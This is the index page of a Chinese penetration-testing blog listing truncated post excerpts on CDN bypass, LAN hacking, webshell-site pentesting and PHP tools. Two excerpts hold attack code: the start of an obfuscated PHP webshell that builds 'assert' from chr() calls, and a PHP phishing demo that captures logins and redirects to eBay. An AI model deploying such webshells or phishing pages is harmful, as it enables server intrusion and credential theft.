没有注明转载均为原创,转载注明出处。关注网络安全,手机渗透,树莓派,便捷式渗透,移动linux,qq1071320680
    据说有黑客潜质的人,三秒钟能记下本博客域名哦!wobushi.cn (wo bu shi )vam

为民除害|渗透某webshell下载网站

为民除害|渗透某webshell下载网站
过程早在大年初三就写好了。。。。 目标  www.xxxxcom 此网站大量转载知名论坛帖子,提供asp,php等带后门的木马下载。 不过呢,对事不对人,打码还是要的啊~ 开放端口 其中,2222端口为DirectAdmin控制面板登录页面,感觉可以在这里下手 探测到的敏慢目录 xxx.com/pma xxx.com/phpmyadmin 得到两个php……继续阅读 »

Vam 6个月前 (02-01) 1978浏览 2评论

突破CDN的一个小技巧

突破CDN的一个小技巧
有时候遇到网站使用CDN,找不到真实的ip,可以尝试使用这个方法。   首先,发现网站有个绑定 邮箱功能 填写好邮箱地址,成功收到邮件,点击显示邮件原文  然后,突破CDN,找到真实的ip地址了   ……继续阅读 »

Vam 6个月前 (01-27) 882浏览 1评论

记一次渗透过程–奇葩获得sqlserver密码

记一次渗透过程–奇葩获得sqlserver密码
这是要连续发两篇渗透文章的节奏啊。。。 题目是这样的:题目是锡哥出的。 要求:给你一个软件,这个软件包含两台以上的服务器,渗透并拿到其中最高权限。不可假借他人之手。可以爆破,可以注入,可以上传,反正你喜欢~   作为一个不懂二进制的Web Dog,需要分析软件,只能把它拖到一个干净的虚拟机,利用各种软件来进行分析…. 寻找软件接口……继续阅读 »

Vam 6个月前 (01-17) 1031浏览 2评论

局域网安全|如何黑了你电脑

局域网安全|如何黑了你电脑
博客有话说:好久没跟新博客了,再不更新对不起大家啊。。。文章是不久前写的。。。。 0X00 引言 某日计算机课,被妹子请教学习上的问题。聊着聊着就上课了,但是还没有帮妹子解决问题,妹子一面无奈地回到了自己的位置。作为一个“技术宅”,怎么能容忍解决不了妹子的问题;为了能够保住在妹子心中技术流的形象。不做一个半途而废的人,一定帮妹子解决问题。 但是又作为一个伪……继续阅读 »

Vam 6个月前 (01-17) 1629浏览 3评论

命令行工具Nircmd使用小案例

命令行工具Nircmd使用小案例
简述 NirCmd是一款命令行使用小工具,通过它可以在命令行下实现很多对系统的操作。比如你可以在命令行下完成:截图,弹出信息框,在某个路径建立快捷方式/打开浏览器,隐藏桌面,操作注册表/文件/网络/连接/显示器/光驱等,拨号连接到的网络账户以及VPN网络,重启、关闭计算机,创建文件快捷方式,改变文件的创建/修改日期,改变显示设置, 关闭显示器,弹出光驱,以及……继续阅读 »

Vam 7个月前 (12-15) 1363浏览 2评论

PHP_curl获取Http状态码

PHP_curl获取Http状态码
<?php $ch = curl_init(); //初始化CURL连接 curl_setopt($ch,CURLOPT_URL,”http://wobushi.cn/”); //指定url /* CURL函数库里最重要的函数是curl_setopt(),它可以通过设定CURL函数库定义的选项来定制HTTP请求。上述代码片段中使用了……继续阅读 »

Vam 10个月前 (09-29) 576浏览 0评论

php 一句话

php 一句话
这思路不错~可以自己变异 <?php $a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]); $b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr(……继续阅读 »

Vam 10个月前 (09-21) 544浏览 0评论

php钓鱼攻击demo

php钓鱼攻击demo
把文件改为login.php,钓鱼网站的提交地址改为login.php所在位置 用主流浏览器把目网页另存,修改提交地址为login.php即可 <?php header ('Location: https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo&siteid……继续阅读 »

Vam 11个月前 (09-10) 697浏览 1评论

抓取软件后门的简单技巧

抓取软件后门的简单技巧
首先打开抓包工具WSExplorer,选择进程 发现有一个除了检测的shell以外的一个连接 ,地址为115.236.113.10 把上图的ip地址拿到同服务器查询,发现是网易乐乎的博客站点 打开wireshark,抓取115.236.113.10的所有数据包 ip.dst_host==115.236.113.10 or ip.src_hos……继续阅读 »

Vam 11个月前 (08-25) 892浏览 0评论

termux:启动php内置web服务器

termux:启动php内置web服务器
    关于termux就不多作介绍了,termux所有的包里面,包含php,但是没有Apache,nginx等等web服务器,如果我们要在Termux里面跑web服务器,可以借助php内置的web服务器。 自PHP5.4之后 PHP内置了一个Web 服务器。 首先,在termux里安装php包 apt update apt isntal……继续阅读 »

Vam 11个月前 (08-19) 1184浏览 2评论